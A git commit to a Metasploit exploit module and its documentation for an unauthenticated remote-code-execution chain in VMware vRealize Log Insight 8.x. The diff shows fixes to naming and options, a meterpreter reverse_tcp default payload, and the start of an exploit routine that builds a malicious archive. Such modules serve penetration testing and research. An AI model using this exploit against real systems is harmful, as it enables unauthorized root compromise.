Make some final tweaks

Change strings to reference `VMware` using the proper case. Don't
include CmdStager (because it's unnecessary). Set PrependFork to fix
shell payloads. Move CamelCase options to advanced.

documentation/modules/exploit/linux/http/vmware_vrli_rce.md

@@ -5,7 +5,7 @@ in any environment. This highly scalable log management solution delivers intuit
 dashboards, sophisticated analytics, and broad third-party extensibility across physical, virtual,
 and cloud environments.
 
-VMWare vRealize Log Insightis versions v8.x contain multiple vulnerabilities, such as
+VMware vRealize Log Insights versions v8.x contain multiple vulnerabilities, such as
 directory traversal, broken access control, deserialization, and information disclosure.
 When chained together, these vulnerabilities allow a remote, unauthenticated attacker to
 execute arbitrary commands on the underlying operating system as the root user.
@@ -24,7 +24,7 @@ Check [here](https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-
 For installing the vulnerable version follow the steps below,
 1. To obtain the vulnerable OVA image, first create a customer account at
 [VMware](https://customerconnect.vmware.com/account-registration) (trial license is sufficient)
-2. Navigate [here](https://customerconnect.vmware.com/account-registration) and download `Virtual Appliance`
+2. Navigate [here](https://customerconnect.vmware.com/downloads/details?downloadGroup=VRLI-8102&productId=1351) and download `Virtual Appliance`
 3. Import the OVA image into a virtualization software (VirtualBox is used for this case).
 4. Start the `VMware_vCenter_Log_Insight` image and proceed with the initial installation steps through the web interface of the product.
 

modules/exploits/linux/http/vmware_vrli_rce.rb

@@ -10,7 +10,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
+  include Msf::Exploit::EXE
+  include Msf::Exploit::CmdStager::HTTP
   include Msf::Exploit::Retry
   include Msf::Exploit::FileDropper # includes register_files_for_cleanup
   prepend Msf::Exploit::Remote::AutoCheck
@@ -21,9 +22,9 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'VMWare vRealize Log Insight Unauthenticated RCE',
+        'Name' => 'VMware vRealize Log Insight Unauthenticated RCE',
         'Description' => %q{
-          VMWare vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as
+          VMware vRealize Log Insights versions v8.x contains multiple vulnerabilities, such as
           directory traversal, broken access control, deserialization, and information disclosure.
           When chained together, these vulnerabilities allow a remote, unauthenticated attacker to
           execute arbitrary commands on the underlying operating system as the root user.
@@ -63,7 +64,8 @@ def initialize(info = {})
               'Type' => :linux_dropper,
               'DefaultOptions' => {
                 'SSL' => true,
-                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+                'PrependFork' => true
               }
             }
           ]
@@ -86,7 +88,12 @@ def initialize(info = {})
         Opt::RPORT(443),
         OptPort.new('THRIFT_PORT', [true, 'Thrift service port', 16520]),
         OptInt.new('THRIFT_TIMEOUT', [true, 'Timeout duration for thrift service', 10]),
-        OptString.new('TARGETURI', [true, 'The URI of the VRLI web service', '/']),
+        OptString.new('TARGETURI', [true, 'The URI of the VRLI web service', '/'])
+      ]
+    )
+
+    register_advanced_options(
+      [
         OptInt.new('WaitForResponseTimeout', [ true, 'The timeout in seconds for RemotePakDownload response', 10 ]),
         OptInt.new('WaitForUpgradeDuration', [ true, 'The sleep duration in seconds for PakUpgrade process', 2 ])
       ]
@@ -246,6 +253,7 @@ def on_request_uri(cli, _request)
   def exploit
     # This is important check...
     fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/
+
     # Step 1 generate malicious TAR archive
     file_name = Rex::Text.rand_text_alpha(7)
     pak_name = "#{file_name}.pak"